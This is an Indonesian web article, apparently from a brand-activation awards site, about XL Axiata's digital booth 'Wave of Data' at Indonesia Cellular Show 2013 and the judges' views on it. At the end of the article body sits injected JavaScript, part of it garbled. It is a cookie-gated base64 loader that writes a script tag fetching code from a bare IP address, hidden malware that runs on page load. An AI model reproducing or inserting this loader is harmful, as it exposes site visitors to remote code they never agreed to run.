Best Of The Best Brand Activation for Youth 2013: Wave of Data, XL on Indonesia Cellular Show 2013

PT XL Axiata Tbk. kembali berpartisipasi dalam event tahunan Indonesia Cellular Show (ICS) yang digelar pada Juni 2013 lalu di JCC Senayan, Jakarta. Kali ini XL tampil berbeda dengan konsep booth yang mengomunikasikan beragam program dan layanan digital lewat konsep digitalized booth bertajuk “Wave of Data”. Deretan inovasi program dan games yang tampil dalam konsep digital terkini ini ditunjang dengan jaringan XL dalam paket XL HotRod 3G+.

Selain menampilkan konsep booth yang 'digitalized' XL juga menghadirkan program terbarunya, “XL The Superstar Tanpa Bakat”, yang ditujukan untuk anak-anak muda yang ingin menunjukkan kreativitas dan keunikannya.

XL pun meluncurkan fitur, produk baru, dan kampanye baru dalam perhelatan ICS 2013 ini, diantaranya, XL Tunai Tap berupa stiker yang berfungsi sebagai alat pembayaran digital atau semacam e-money; XL Nonton yaitu sebuah aplikasi mobile di sistem operasi Android dimana konsumen bisa menonton sejumlah film lokal dan internasional terbaru lewat gadget mereka; Kolaborasi XL dengan Kakao Talk untuk menampilkan games baru dari Instant Messaging tersebut; berbagai augmented reality experience berupa games dan video mapping dan photo contest bersama Brand Ambassador XL, Grup Band Noah; dan kampanye besarnya tahun ini, “XL The Superstar Tanpa Bakat”.

Menurut Syarifudin, Marketing Manager Event Activation & Community PT XL Axiata Tbk., sejak dua tahun lalu pengunjung ICS kebanyakan adalah anak muda yang punya keingintahuan besar terhadap perkembangan telekomunikasi. Hal ini, kata pria yang akrab disapa Arif itu, sesuai dengan target market XL, yaitu anak-anak muda berusia 15-25 tahun dengan karakter yang dinamis, kreatif, butuh eksistensi, dan digital minded. Maka, lanjutnya, XL menghadirkan sejumlah program menarik untuk meng-engage mereka di booth XL ICS 2013, yaitu antara lain dengan menggelar program “XL The Superstar Tanpa Bakat.”

Dengan menghadirkan full engagement exhibition, pengunjung atau konsumen dapat langsung melihat, merasakan, dan mengalami langsung inovasi-inovasi di booth “Wave of Data”, XL meraih penghargaan Best Booth dari penyelenggara ICS 2013.

Juri The Most Impactful Brand Activation 2013 Adi Wijaya menilai, XL berhasil mempertahankan eksistensi mereka di ajang ICS dengan tetap mengedepankan teknologi digital yang sesuai dengan target segmen mereka, sekaligus memperkuat image sebagai provider yang kuat di layanan digital atau internet.

Sementara Fary Farghob, pakar dan praktisi kontes tahunan Brand Activation ini, menilai XL berhasil mengimplementasikan big idea "XL Advancing You" dari aktivasi ini secara inovatif, menarik dan highly interactive. Hanya sedikit kritik Fary tentang aktivasi ini, yaitu bahwa elemen-elemen yang menonjol tersebut—yaitu eksekusi big idea yang inovatif, menarik, dan interaktif—itu tidak dirangkum untuk dikomunikasikan secara eksplisit. “Sehingga take out dari konsumen mengenai komunikasi yang dilakukan, beragam,” katanya. function getCookie(e)\(\)\\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time)

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Sign In

Get the most out of SWA by signing in to your account

(close)

Register

Have an account? Sign In
(close)